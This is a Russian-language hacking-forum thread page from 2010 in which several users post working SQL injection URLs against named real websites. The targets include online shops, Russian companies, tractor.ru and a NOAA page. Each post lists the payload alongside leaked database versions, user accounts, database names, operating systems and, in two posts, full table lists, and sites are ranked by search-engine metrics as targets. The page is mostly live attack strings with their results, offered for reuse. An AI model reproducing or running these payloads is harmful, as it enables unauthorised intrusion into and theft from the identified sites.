ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12091  
Старый 09.05.2010, 13:44
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

quakerbridgemall.com PR-5

Код:
http://www.quakerbridgemall.com/offers.php?id=39+union+all+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,0+--+
Код:
5.0.27:quakerdb2user@localhost:QuakerDB2
 
Ответить с цитированием

  #12092  
Старый 09.05.2010, 15:26
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт - http://www.animationtrip.com
ТИЦ: 10
PR: 4
Пример запроса:
Код:
http://www.animationtrip.com/item.php?id=-257+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4--+
version - 4.1.22-standard-log
user - animationtrip@localhost
database - animationtrip
os - pc-linux-gnu

===========================================

Сайт: http://www.paer.ru
ТИЦ: 130
PR: 3
Пример запроса:
Код:
http://www.paer.ru/info/item.php?id=11+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+
version - 5.0.75-log
user - srv19733_root@c27-w.ht-systems.ru
database - srv19733_db1
os - portbld-freebsd7.0

===========================================

Сайт: http://plusiminus.com
ТИЦ: 170
PR: 4
Пример запроса:
Код:
http://plusiminus.com/item.php?id=412+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))--+
version - 5.1.41-log
user - m35978@fhe11.hoster.ru
database - db35978m
os - portbld-freebsd8.0

===========================================

Сайт: http://www.purepeopleproducts.com
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.purepeopleproducts.com/index5.php?id=-12+union+select+concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+
version - 5.0.51a-3ubuntu5.5-log
user - CN20070091@localhost
database - CN20070091_ppp
os - debian-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
_mailtemplates,   
_metavars,   
adres,   
artikel,   
artikel_rubriek,   
artikel_verpakking,   
artikelomschr,   
betaalwijze,   
boxtype,   
branche,   
collectie,   
collectie_omschr,   
collectie_slides,   
contactpersoon,   
country,   
custstatus,   
dessin,   
factuur,   
form,   
functie,   
gebruikers,   
gebruikersrol,   
hangtag,   
hscode,   
info_slides,   
infoitem,   
interface_wrds,   
klant,   
klant_contact,   
klant_item,   
klant_item_status,   
klant_item_type,   
klant_resp,   
kleur,   
land,   
levering,   
levertijd,   
maat,   
mailing,   
materiaal,   
menu_slides,   
menuitem,   
orderopmerking,   
packingperpcs,   
ppplabel,   
producent,   
producent_collectie,   
producent_contact,   
productieorderregel,   
productieorders,   
productieorderstatus,   
productietijd,   
profiel,   
rubriek,   
sidelabel,   
silverlogo,   
slides,   
temp,   
transport,   
transporteur,   
verkooporder,   
verkooporderregel,
 
Ответить с цитированием

  #12093  
Старый 09.05.2010, 15:43
b82a
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439

Репутация: 127
Отправить сообщение для b82a с помощью ICQ
По умолчанию

Код:
https://www.infoslice.com/?cmd=del&id=-1+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
User: infoslice@localhost
Database: infoslice
Version: 5.1.44

Код:
http://www.knowledgeforaction.info/articoloPrt.php?id=-1+union+select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,2,3/*
User: de kfainfo_db@64.202.163.81
Database: kfainfo_db
Version: 4.0.27-max-log

Последний раз редактировалось b82a; 09.05.2010 в 16:05..
 
Ответить с цитированием

  #12094  
Старый 09.05.2010, 16:36
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://tractor.ru
ТИЦ: 2000
PR: 5
Пример запроса:
Код:
http://tractor.ru/partners/index5.php?id=-11767+union+select+1,db_name(),@@version,system_user,user,6,7,8,9,10,11,12,13--+
version - Microsoft SQL Server 2005 - 9.00.4053.00 (X64) May 26 2009 14:13:01 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

system user - specserver-2
user - dbo
database - specserver-2

===========================================

Сайт: http://www.bxllaique.be
ТИЦ: 0
PR: 5
Пример запроса:
Код:
http://www.bxllaique.be/index5.php?m1=0&m2=2&id=52&g=2+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(unhex(hex(@@version_compile_os)),+1,+63),+floor(rand(0)*2)))--+
version - 4.1.9-standard-log
user - bxllaique@localhost
database - bxllaique
os - pc-linux-gnu

===========================================

Сайт: http://www.capstonetea.com
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.capstonetea.com/index4.php?ID=11+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(version(),+1,+63),+floor(rand(0)*2)))
version - 4.1.22-standard
user - capstone_capston@localhost
database - capstone_CapstoneWeb
os - pc-linux-gnu

Последний раз редактировалось aka_zver; 09.05.2010 в 23:15..
 
Ответить с цитированием

  #12095  
Старый 09.05.2010, 19:56
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

Пара немчиков

Код:
http://www.neusserkarneval.de/presse/show.php?id=-1+union+select+1,database(),version(),4,5,6,7,8,user(),10,11,12,13,14%20--
Database: db215839
Version: 4.1.22-standard-log
User: db215839@local2

Код:
http://www.art-in.de/incmeldung.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8%20--
Database: db1082979-artintv
Version: 5.0.32-Debian_7etch11-log
User: dbu1082979@localhost
PR: 4
ТИЦ: 20

================================================== ===================
Любителям металла

Код:
http://www.avantgarde-metal.com/content/stories2.php?id=-86%27%20union%20select%201%2C%202%2C%20concat_ws(0x3a,database(),version(),user())%2C%204%2C%205%2C%205%23%20AND%20%271%27=%271
Database: d0052127
Version: 4.1.22-max-log
User: d0052127@localhost
PR: 3

Код:
http://suriyanto.net/rock/rockmusic.php?id=3337'+union+select+1,2,3,4,5,6,7,8%23+AND+%271%27=%271
Database: suriyant_muziek
Version: 5.0.81-community
User: suriyant_yanto@localhost
PR: 3

================================================== ===================

Код:
http://www.brushesdownload.com/tfile.asp?id=-1250'+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7'
Databese: dbbrushesdownload
Version: 5.1.45-community
User: brushesd@C24327-34937
PR: 4

Код:
http://www.carbodydesign.com/video/?id=-2990+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,database(),version(),user()),11,12,13,14,15,16,17,18,19,20,21%20--
Database: carbodyd_db
Version: 5.0.90-community
User: carbodyd_dbuser@localhost
PR: 3
ТИЦ: 80

Последний раз редактировалось BrainDeaD; 09.05.2010 в 20:11..
 
Ответить с цитированием

  #12096  
Старый 09.05.2010, 20:46
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

Код:
www.javaportal.ru/books/aboutbook.php?id=30UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12--
Код:
fruitharvesting.com/productinfo.php?id=52UNION ALL SELECT 1,%String_Col%,3,4 and 'x'='x
Код:
www.brill.se/productInfo.php?id=111UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
Код:
www.atmtravel.com.au/productinfo.php?id=-123 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
Код:
www.hypetrading.com/productinfo.php?id=285UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9--
Код:
www.jemesp.com/productInfo.php?id=4UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Код:
www.wedding-cake-toppers.com.au/productinfo.php?ID=15 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9--
Код:
www.crestonsfurnishings.co.uk/productinfo.php?id=212 AND %True_Expression% AND 'x'='x
Код:
www.jemesp.com/productInfo.php?id=4 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
Код:
www.theshopnyny.com/productinfo.php?id=928UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Код:
www.gmscsolution.com/productinfo.php?id=384 UNION ALL SELECT 1,%String_Col%,3,4,5--
Код:
www.fullcirclefurnishings.com/productinfo.php?id=213 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x
Код:
www.bugnbots.com/productinfo.php?ID=6 UNION ALL SELECT %String_Col%,2,3,4--
Код:
www.luckinthebox.com/productinfo.php?id=262 AND %True_Expression%
Код:
www.kingsleysestates-furnishings.co.uk/productinfo.php?id=411 AND %True_Expression% AND 'x'='x
Код:
www.crestonsfurnishings.co.uk/productinfo.php?id=212 AND %True_Expression%
Код:
superwholesales.com.au/productinfo.php?id=10 AND %True_Expression%
Код:
marqueeequity.com/productinfo.php?id=9 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Код:
www.idoweddingfavours.com.au/productinfo.php?ID=406 UNION ALL SELECT %String_Col%,2,3,4,5,6,7--
Код:
fruitharvesting.com/productinfo.php?id=49 UNION ALL SELECT 1,%String_Col%,3,4 and 'x'='x
Код:
www.blackkatzfurnishings.com/productinfo.php?id=499 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x
Код:
fullcirclefurnishings.com/productinfo.php?id=367 UNION ALL SELECT 1,2,%String_Col%,4 and 'x'='x
 
Ответить с цитированием

  #12097  
Старый 09.05.2010, 22:42
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://response.restoration.noaa.gov/faq_topic.php?faq_topic_id=-1+union+select+1,2,concat(user(),char(58),version( ),char(58),database(),char(58),@@version_compile_o s),4,5,6,7,8,9,10+from+users--
 
Ответить с цитированием

  #12098  
Старый 10.05.2010, 02:21
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Код:
http://www.assetrisk.com/about-us/people.php?ID=-34+union+select+1,2,3,4,5,6,7,8+--+
Version: 5.0.51a-community-nt
User: root@localhost
Database: assetrisk
 
Ответить с цитированием

  #12099  
Старый 10.05.2010, 09:22
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

Код:
http://www.magelectric.ru/?p=-196+union+all+select+1,2,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),4,5,6,7+--
version : 5.0.22
user : magelectric@localhost
database : magelectric
os : redhat-linux-gnu
 
Ответить с цитированием

  #12100  
Старый 10.05.2010, 13:12
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.ncgtourism.ca
ТИЦ: 0
PR: 4
Пример запроса:
Код:
http://www.ncgtourism.ca/index4.php?id=-1+union+select+1,@@version_compile_os--+
version - 4.1.20
user - tourism@localhost
database - toursitedb
os - redhat-linux-gnu

==========================================

Сайт: http://www.onaonline.ru
ТИЦ: 30
PR: 3
Пример запроса:
Код:
http://www.onaonline.ru/news_box.php?idnews=407'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7--+
version - 5.0.26-log
user - onaonline@localhost
database - onaonline
os - pc-linux-gnu

==========================================

Сайт: http://www.gazteplostroi.ru
ТИЦ: 30
PR: 0
Пример запроса:
Код:
http://www.gazteplostroi.ru/item.php?id=-138'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),null,null,6,7,now()+from+information_schema.tables--+
version - 5.0.77
user - intertime_gaz@localhost
database - intertime_gaz
os - pc-linux-gnu
tables:

Код:
CHARACTER_SETS,   
CLIENT_STATISTICS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
INNODB_BUFFER_POOL_CONTENT,   
INDEX_STATISTICS,   
KEY_COLUMN_USAGE,   
PROCESSLIST,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TABLE_STATISTICS,   
TRIGGERS,   
USER_PRIVILEGES,   
USER_STATISTICS,   
VIEWS,   
INNODB_IO_PATTERN,   
gts_about,   
gts_articles,   
gts_catalog,   
gts_catalog_cats,   
gts_contacts,   
gts_docs,   
gts_faq,   
gts_faq_cats,   
gts_links,   
gts_links_cats,   
gts_news,   
gts_pages,   
gts_price,   
pm_routelinks,   
pm_routelinks_cat

Последний раз редактировалось aka_zver; 10.05.2010 в 15:49..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
 


Быстрый переход




ANTICHAT.XYZ